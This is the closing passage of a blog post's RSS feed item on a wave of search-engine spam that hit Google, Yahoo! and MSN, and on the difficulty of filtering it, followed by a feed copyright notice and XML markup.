This recent round of spamming was not unique to Google; it affected the Yahoo! and MSN search results as well, though not to the extent that it did to Google&#8217;s.  It was probably not the intention of the spammer to get so many pages indexed on Google, and probably got &#8220;out of hand&#8221; quickly, however, one has to wonder if this spam site directly targeted Google in its quest for search engine manipulation, or whether this was just a coincidence.  But the problem for search engines remains, and that is, how to effectively discriminate between meaningful and useless information, without making too many mistakes, one way or the other.
</p>
<p>
Thankfully, it appears the Google is working on fixing this problem, and not only by just removing the most recent spams.  It will take some work, but I think they should hopefully arrive at a solution, but as always, spammers will always be working to gain the upper hand as well.  Let&#8217;s hope that the combined effort of companies like Google, Yahoo! and Microsoft can thwart them, or else the Internet may become awash in the useless garbage of spam.</p>
<hr/>Copyright &copy; 2012 <strong><a href="http://unitstep.net">unitstep.net</a></strong>. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact <strong><a href="mailto:webmaster@unitstep.net">webmaster@unitstep.net</a></strong> for more information.<br/><span style="float: right;font-size: 7pt"><a href="http://blog.taragana.com/index.php/archive/wordpress-plugins-provided-by-taraganacom/">Plugin</a> by <a href="http://www.taragana.com/">Taragana</a></span>]]></content:encoded>
			<wfw:commentRss>http://unitstep.net/blog/2006/06/19/search-engine-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

